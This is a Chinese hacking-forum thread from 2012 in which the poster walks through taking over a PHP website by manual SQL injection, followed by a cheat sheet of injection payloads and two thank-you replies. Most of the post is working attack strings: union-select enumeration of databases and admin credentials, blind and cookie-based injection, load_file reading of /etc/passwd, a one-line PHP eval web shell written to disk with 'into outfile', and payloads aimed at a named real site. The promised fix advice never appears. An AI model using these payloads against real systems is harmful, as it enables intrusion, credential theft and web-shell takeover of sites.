找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3149|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~* q5 Q3 B# j7 k1 T) I' o; k
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
  I9 a5 s3 S1 y5 z. M$ R! Y7 ~7 N! z我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。  _9 Q0 z( H3 M5 ?0 @  Y( f
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)3 m, ~( p& a. @/ a! j% U' R
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)1 G( f6 Y- K8 j1 x
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
# t! c' ]$ Q/ ^Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
8 N; X+ D4 |7 O) E) f/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
$ [! r8 ^4 p/ e$ {                        
* u8 `' U9 T1 K# C  q2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
) b5 \* b# Y3 H1 W5 F3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
: l7 {) D3 b- D4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息# l0 A/ X4 p" ?( f/ `$ ?7 ~% D
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
/ M/ k7 ?0 Y7 C! T2 ^4 T' j6 V  B有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
" c! k! x3 s0 ^8 G$ |: @4 |2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。( c7 a/ e# G/ a
我就用的是第二个思路,7 C( m, s6 i7 i0 J2 u6 W! b0 g
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
7 i( [, w: v+ t5 g& P( w6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
8 ~! ]% c- n# t% A提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
) s; T( b% p) D注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
' S0 W) `  n# S  ~" R7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
5 }& v7 W0 v) W/ k! a/ S是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....2 \; S# @1 j7 q
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --% _  R; H  E1 f6 X
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
* J- t7 S! A! I& d- K调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......) Z' C3 c: {, U& Q  r' O6 ^
下面是一些很普遍注入方式资料:2 X7 i# l5 H6 O- m* g6 Z2 k
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='- S7 ]$ N8 p) A+ ~( `
拆半法4 r" H9 u- d: [* Y6 C
######################################) a2 H: \5 _" g" \7 g
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
( {7 B4 H6 s# Y* E# D) U' I" Iand exists (select * from admin)
( v$ L+ z1 p8 F  M* oand exists(select id from admin)5 W: m$ t+ n+ K- r9 N" z' c. m, x/ p
and exists(select id from admin where id=1)6 L) k" {6 |, ?4 T- N
and exists(select id from admin where id>1)
" w, x! S, r1 @然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 % x" N' H' d" j* s7 R) y, W
and exists (select username from admin)/ C/ a+ K/ W8 T0 S3 }
and exists (select password from admin)5 C) j. o$ O/ E/ j5 ^0 @
and exists (select id from admin where len(username)<10 and id=1)) w9 R$ q! H: @# E; c
and exists (select id from admin where len(username)>5 and id=1)( ^( m' _# G+ [- }" z$ c# J
and exists (select id from admin where len(username)=6 and id=1), S0 U4 ]! I' m
and exists (select id from admin where len(password)<10 and id=1)- i: B& Z! V$ z0 A# {3 l
and exists (select id from admin where len(password)>5 and id=1)
: W9 K) g) V. _3 n5 f# v/ |0 f$ g  Uand exists (select id from admin where len(password)=7 and id=1)
# `# I6 V/ B$ d  d2 Kand (select top 1 asc(mid(username,1,1)) from admin)=97; x/ y* E. V" H: a# ]+ J, h
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。1 f  u0 M( Q$ R* c; f$ b, I
猜第二位把username,1,1改成username,2,1就可以了。
1 u3 |3 A; G- E2 R. ]# o猜密码把username改成password就OK了5 R$ w7 _9 P9 N: B( W: Q% D
##################################################, n. x0 S- D7 r2 v; A" \# {# }( L
搜索型注入' R6 ~' ]0 f7 z" q
##################################
$ Q: x; y; x5 V! a( e1 [%' and 1=1 and '%'='0 l: }6 X: k$ x7 r, S' P
%' and exists (select * from admin) and '%'='% t" _( V  F+ \
%' and exists(select id from admin where id=1) and '%'='
9 ~; y: n, I; {%' and exists (select id from admin where len(username)<10 and id=1) and '%'='* ]. P8 K1 b4 s/ f$ o7 w& ]/ e
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='4 I- B1 O, ?/ t3 C0 W4 a0 w
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
. {6 l1 ?  q; g9 E) m) N6 j这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='+ ~; `8 r& _! p9 {
对于MSSQL数据库,后面可以吧 and '%'='换成--
. c; l* l0 e  F1 n; p9 A还有一点搜索型注入也可以使用union语句。
* X" ~9 U7 `8 R" p% E' f########################################################
, l; j2 _* H# Q. {/ x联合查询。; s5 W  [) W3 k
#####################################3 O( K; B4 \7 q
order by 10. n  C! v$ `& ]! R
and 1=2 union select 1,2,3,4,5,6,7,8,9,102 g% q3 [3 T+ q/ w: @2 L* j
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin- Y5 E' ^" \  ~
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
) ?8 @, M: u+ G% M* u6 ^很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
3 O; M& R/ i% E###################################
/ [3 p) l# |* V- J0 ocookie注入
5 h5 X/ O* d. `' H" @- o5 v###############################
  g5 d9 l0 w+ P6 w" p" T5 _http://www.******.com/shownews.asp?id=1272 b# G5 e$ G' b' {) H
http://www.******.com/shownews.asp
0 F% C& Q) ^1 B! s& qalert(="id="+escape("127"));: A7 ^4 y- z+ Q
alert(="id="+escape("127 and 1=1"));# Y4 v0 l' W0 }, U( X
alert(="id="+escape("127 order by 10"));6 i7 J+ ^7 p% r& o
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
7 T/ P* S/ y, N5 H" J! B$ r/ Ealert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));+ o1 Z" `8 s4 g, Z$ A* u; {/ x
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
- a/ Z+ w' r" r5 `###################################3 E* b. F( E; t1 W$ u) m
偏移注入, z7 @) ^' g6 v- b: Y0 F( m+ `
###########################################################5 e, y8 T& |  c1 B3 b3 I
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
1 N. T" y! e* t) S' tunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
5 q0 n  |0 l/ N& i, |/ _- d' t- H3 lunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
' G: U8 X. p  c. |, A; Junion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)7 N& S1 n" v4 Y" t
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
2 u* f3 a9 D4 v) junion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
3 r9 Y( M$ N0 m2 |union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
. ^1 Z+ k5 }# da.id=d.id)# u4 e1 p: y; q, _0 ]" ~
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)# Y. z% ^6 k3 F5 V: X4 E
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
2 F" X8 J' o: x* j( c+ X  1 W" W6 T/ O0 x3 z" |0 u
============================================================================================================
0 L# Q/ h% f) N, G; _4 a7 Z1.判断版本
# ^6 X  d, i1 g3 q2 p0 Band ord(mid(version(),1,1))>51- {: i: O& O% s: H9 }# O1 U
返回正常,说明大于4.0版本,支持ounion查询
2 {) ?$ S3 P" A, G! q# O" J2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
& [, [& x- _8 g. K% [and 2=4 union select 1,2,3,4,5,6,7,8,9--
) {+ ]8 r5 j1 [2 M2 ]& x5 s3.查看数据库版本及当前用户,0 ^: B+ B% d* [1 d! j; u
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--- y3 d. ?3 M( l4 i0 x
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
7 p; K) e1 L8 P& o. ?4 s7 d4.判断有没有写权限+ Y0 O  y5 @  ?$ ~% o. ^0 F
and (select count(*) from MySQL.user)>0-- ! `+ T; U0 r& Q1 x% O1 `
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1' j) j8 h: b7 t9 a5 y
用不了这个命令,就学习土耳其黑客手法,如下9 u# X" P4 f! i1 s+ ?( r9 ]
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--- U7 d* R+ ]0 P8 V& L/ D# ~
6.爆表,爆库0 r# P5 @+ `2 T) Z9 H6 M& v
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--2 \2 W6 s* E; N
7.爆列名,爆表  V1 x* v- G' K& K6 d) k
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
% M/ F6 ^" M2 ~6 v/ h" N* l7 Q8 _% [8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
( Y# P$ A8 ~# ^' [" o$ D; uand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
) {0 k7 }( G/ p: _* y, c6 d9.爆字段内容
, A+ M4 j3 |5 K' y" O: yand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--+ {4 A4 [: j$ \( [$ S& x
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表